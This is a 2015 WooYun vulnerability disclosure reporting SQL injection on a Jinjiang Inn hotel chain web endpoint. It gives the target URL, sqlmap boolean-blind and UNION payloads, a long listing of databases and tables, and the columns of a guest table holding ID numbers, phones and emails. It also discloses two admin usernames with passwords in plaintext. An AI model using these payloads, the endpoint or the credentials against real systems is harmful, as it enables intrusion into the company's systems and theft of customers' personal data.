当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097029

漏洞标题:锦江之星SQL注射漏洞涉及大量用户信息

相关厂商:锦江之星旅馆有限公司

漏洞作者: Me_Fortune

提交时间:2015-02-12 21:05

修复时间:2015-03-29 21:06

公开时间:2015-03-29 21:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-12: 细节已通知厂商并且等待厂商处理中
2015-02-13: 厂商已经确认,细节仅向厂商公开
2015-02-23: 细节向核心白帽子及相关领域专家公开
2015-03-05: 细节向普通白帽子公开
2015-03-15: 细节向实习白帽子公开
2015-03-29: 细节向公众公开

简要描述:

贵宾用户,普通用户,姓名,电话,Email,各种信息泄露,一千多万条数据。。。。。。。。。

详细说明:

注入点:http://220.196.57.147:8080/GetUnit.aspx?City=3100&service=api_getcitypio
City存在注入:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: City
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=3100' AND 8275=8275 AND 'hJnG'='hJnG&service=api_getcitypio
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: City=3100' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(102)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(71)+CHAR(120)+CHAR(121)+CHAR(97)+CHAR(85)+CHAR(72)+CHAR(113)+CHAR(83)+CHAR(88)+CHAR(113)+CHAR(119)+CHAR(103)+CHAR(100)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &service=api_getcitypio
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: JJWEB_20131025
[67 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| DN_Unit_Old |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WeiXinResv |
| JW_qykh |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: tempdb
[1 table]
+-----------------------------------------------------+
| #6A06A917 |
+-----------------------------------------------------+
Database: WebReport
[5 tables]
+-----------------------------------------------------+
| TrafficOrderCount |
| TrafficStatistics |
| TrafficType |
| vw_TrafficOrderCount |
| vw_TrafficStatistics |
+-----------------------------------------------------+
Database: DataSwitch
[16 tables]
+-----------------------------------------------------+
| CDS_Card |
| CDS_Guest |
| CDS_GuestWebUser |
| CDS_Guest_Invalid |
| CardOperationLog |
| GuestTrans |
| HT_Reception |
| ServiceList |
| ServiceLog |
| T_CARDLIST |
| T_IN_MEMBER_INFO |
| T_IN_RIGHT_CARD |
| T_LOY_POINT |
| T_OUT_MEMBER_INFO |
| T_OUT_RIGHT_CARD |
| T_TXN_LIST |
+-----------------------------------------------------+
Database: JJWEB
[96 tables]
+-----------------------------------------------------+
| Activity |
| ActivityInfo |
| CDS_UnitRmTp |
| CJ_Exchange_Info |
| CJ_Luck_Draw |
| CJ_Prize_Config |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| DN_Unit_Old |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_Department |
| JW_DiTieXianLu |
| JW_District |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_HotelPhotoNew |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_PhoneRecharge |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_Questionnaire |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCityCopy |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_UnitLvYun |
| JW_UnitMinPrice |
| JW_UnitToDayPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| RecommendLog |
| Table_1 |
| Test |
| Test_trace |
| VistData |
| WX_CDKey |
| WX_Record |
| sqlmapoutput |
| sysdiagrams |
| testes |
| tests |
| v_DN_UnitInfo |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: InterfaceDB
[8 tables]
+-----------------------------------------------------+
| Jiang |
| ServiceList |
| ServiceLog |
| T_OUT_MEMBER_INFO |
| T_OUT_RIGHT_CARD |
| soau.E$_T_OUT_MEMBER_INFO |
| soau.E$_T_OUT_RIGHT_CARD |
| soau.SNP_CHECK_TAB |
+-----------------------------------------------------+
Database: JJWEB_20141013
[82 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DiTieXianLu |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelArea |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCity_20140115 |
| JW_SpecialCity_a |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_Unit360Flash_1 |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| RecommendLog |
| V_DN_Unit |
| WX_CDKey |
| WX_Record |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
Database: msdb
[138 tables]
+-----------------------------------------------------+
| MSagentparameterlist |
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| MSreplmonthresholdmetrics |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items |
| syscollector_collection_items_internal |
| syscollector_collection_sets |
| syscollector_collection_sets_internal |
| syscollector_collector_types |
| syscollector_collector_types_internal |
| syscollector_config_store |
| syscollector_config_store_internal |
| syscollector_execution_log |
| syscollector_execution_log_full |
| syscollector_execution_log_internal |
| syscollector_execution_stats |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| syspolicy_conditions |
| syspolicy_conditions_internal |
| syspolicy_configuration |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets |
| syspolicy_object_sets_internal |
| syspolicy_policies |
| syspolicy_policies_internal |
| syspolicy_policy_categories |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
+-----------------------------------------------------+
Database: HonorAndJinjiang
[5 tables]
+-----------------------------------------------------+
| Kl_Admin |
| Kl_AdminDo |
| Kl_Lottery |
| Kl_Site |
| dtproperties |
+-----------------------------------------------------+
Database: master
[365 tables]
+-----------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| TrafficOrderCount |
| TrafficStatistics |
| TrafficType |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| vw_TrafficOrderCount |
| vw_TrafficStatistics |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |
| sys.dm_database_encryption_keys |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_auto_page_repair |
| sys.dm_db_mirroring_connections |
| sys.dm_db_mirroring_past_actions |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_persisted_sku_features |
| sys.dm_db_script_level |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_procedure_stats |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_exec_trigger_stats |
| sys.dm_filestream_file_io_handles |
| sys.dm_filestream_file_io_requests |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_fdhosts |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_outstanding_batches |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_dispatcher_pools |
| sys.dm_os_dispatchers |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_brokers |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_node_access_stats |
| sys.dm_os_memory_nodes |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_nodes |
| sys.dm_os_performance_counters |
| sys.dm_os_process_memory |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_spinlock_stats |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_sys_memory |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_resource_governor_configuration |
| sys.dm_resource_governor_resource_pools |
| sys.dm_resource_governor_workload_groups |
| sys.dm_server_audit_status |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_commit_table |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.dm_xe_map_values |
| sys.dm_xe_object_columns |
| sys.dm_xe_objects |
| sys.dm_xe_packages |
| sys.dm_xe_session_event_actions |
| sys.dm_xe_session_events |
| sys.dm_xe_session_object_columns |
| sys.dm_xe_session_targets |
| sys.dm_xe_sessions |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_index_fragments |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.fulltext_stoplists |
| sys.fulltext_stopwords |
| sys.fulltext_system_stopwords |
| sys.function_order_columns |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.resource_governor_configuration |
| sys.resource_governor_resource_pools |
| sys.resource_governor_workload_groups |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_audit_specification_details |
| sys.server_audit_specifications |
| sys.server_audits |
| sys.server_event_notifications |
| sys.server_event_session_actions |
| sys.server_event_session_events |
| sys.server_event_session_fields |
| sys.server_event_session_targets |
| sys.server_event_sessions |
| sys.server_events |
| sys.server_file_audits |
| sys.server_permissions |
| sys.server_principal_credentials |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.spatial_index_tessellations |
| sys.spatial_indexes |
| sys.spatial_reference_systems |
| sys.sql_dependencies |
| sys.sql_expression_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.table_types |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_event_types |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+-----------------------------------------------------+
Database: JJ_RateCodeInventory
[9 tables]
+-----------------------------------------------------+
| CDS_RateIsSelect |
| CDS_UnitRateCode |
| HT_CRSRmTp |
| HT_ChannelGroupInventory |
| HT_ChannelGroupInventory_Tmp |
| HT_ChannelInventory |
| HT_RateCode |
| HT_RateCodeDetail |
| HT_UnitRmTp |
+-----------------------------------------------------+
Database: CRMDB
[7 tables]
+-----------------------------------------------------+
| CDS_Card |
| CDS_Guest |
| CDS_GuestSummary |
| CDS_GuestTrans |
| CDS_GuestWebUser |
| CDS_Guest_Invalid |
| HT_Reception |
+-----------------------------------------------------+
Database: JJWEB_20141124
[82 tables]
+-----------------------------------------------------+
| CDS_UnitRmTp |
| DN_CodeDescript |
| DN_District |
| DN_Unit |
| HT_CRSRmTp |
| HT_PayAccountInnHotel |
| HT_ResvApp |
| HT_UnitInfo |
| HT_UnitPosition |
| HT_UnitRmTp |
| JW_Activity |
| JW_Apply |
| JW_ApplytoJoin |
| JW_BrandInfo |
| JW_BrandInfoCate |
| JW_Bus_XZ |
| JW_Bus_XZ_Hotels |
| JW_Channels |
| JW_ChefInfo |
| JW_ChefInfoCate |
| JW_CityInfo |
| JW_CityPIOData |
| JW_Collect |
| JW_CompanyLink |
| JW_CompanyLinkClass |
| JW_CountryList |
| JW_DataVersion |
| JW_Department |
| JW_DiTieXianLu |
| JW_DownLoad |
| JW_Education |
| JW_FormService |
| JW_Guest_Consultation |
| JW_Guest_HotelComment |
| JW_HotelArea |
| JW_HotelComment |
| JW_HotelPhoto |
| JW_InfoPicture |
| JW_InnHotel_NearInfo |
| JW_JobCate |
| JW_JobPosition |
| JW_LinkCate |
| JW_Links |
| JW_MsgStatus |
| JW_NewsWeiXin |
| JW_OftenOrderHotel |
| JW_OftenOrderUser |
| JW_OperationType |
| JW_OrderBuyCard |
| JW_ProInfo |
| JW_ProInfoCate |
| JW_RecType |
| JW_ScoreClass |
| JW_ScoreTrans |
| JW_ServiceList |
| JW_SiteMsg |
| JW_SpecOffs |
| JW_SpecOffsCate |
| JW_SpecOffsType |
| JW_SpecialCity |
| JW_SpecialCity_20140115 |
| JW_SpecialCity_a |
| JW_StatisticsClass |
| JW_TuiJian |
| JW_Unit360Flash |
| JW_Unit360Flash_1 |
| JW_UnitMinPrice |
| JW_UploadFile |
| JW_UserMsgSite |
| JW_UserQPlus |
| JW_WebServicePicList |
| JW_WeiXinResv |
| JW_qykh |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| RecommendLog |
| V_DN_Unit |
| WX_CDKey |
| WX_Record |
| v_SpecOffs_Info |
| v_dnunit_htunitinfo |
| v_hotellist |
+-----------------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: City
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=3100' AND 8275=8275 AND 'hJnG'='hJnG&service=api_getcitypio
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: City=3100' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(102)+CHAR(112)+CHAR(113)+CHAR(119)+CHAR(71)+CHAR(120)+CHAR(121)+CHAR(97)+CHAR(85)+CHAR(72)+CHAR(113)+CHAR(83)+CHAR(88)+CHAR(113)+CHAR(119)+CHAR(103)+CHAR(100)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &service=api_getcitypio
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: DataSwitch
Table: CDS_Guest
[34 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Address | varchar |
| Birthday | char |
| CAddress | nvarchar |
| CardNo | varchar |
| Cds_Status | int |
| Company | nvarchar |
| CTel | varchar |
| CtfId | varchar |
| CtfTp | varchar |
| CZip | nvarchar |
| Descript | varchar |
| Dirty | char |
| District1 | varchar |
| District2 | varchar |
| District3 | varchar |
| District4 | varchar |
| District5 | varchar |
| District6 | varchar |
| Duty | nvarchar |
| Education | varchar |
| EMail | nvarchar |
| Family | int |
| Fax | nvarchar |
| FirstNm | varchar |
| Gender | char |
| Id | int |
| LastNm | varchar |
| Mobile | varchar |
| Name | nvarchar |
| Nation | nvarchar |
| Taste | varchar |
| Tel | nvarchar |
| Version | datetime |
| Zip | nvarchar |
+------------+----------+

漏洞证明:

10.png


姓名电话Email

11.png


然后我跑了一下太大没跑出来
管理员:

12.png


13.png


来两个管理员的哈:admin 19840113;lottery 19840113
我是如何知道有一千多万的呢:求脱裤大神调教。。。。

13.png


修复方案:

我知道你们会忽略的 = ,-,没深入,请不要查我水表。。。。

版权声明:转载请注明来源 Me_Fortune@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-02-13 15:22

厂商回复:

该系统为测试系统,确实存在漏洞,已安排人员修复,谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-13 00:43 | Yang ( 普通白帽子 | Rank:247 漏洞数:86 | 作为菜鸟,大米手机摔破了怎么办?)

    快过年了。。大牛们又开始住酒店了

  2. 2015-02-13 07:11 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    最后一个传错图了。。。。@xsser

  3. 2015-02-13 15:36 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    呵呵呵呵,我查了一下里面JJWEB的数据库之前报过你们给15rank,这个里面也存在这个数据库你们居然说是测试用的,逗谁呢?@锦江之星旅馆有限公司

  4. 2015-02-13 15:52 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    即使是测试系统,只要涉及用户数据的就是有问题。给1rank有点少……

  5. 2015-02-13 15:52 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    @hkAssassin 数据是真实用户1rank就少了。

  6. 2015-02-13 15:55 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    @her0ma 看楼主的回复,应该是真实的用户数据!

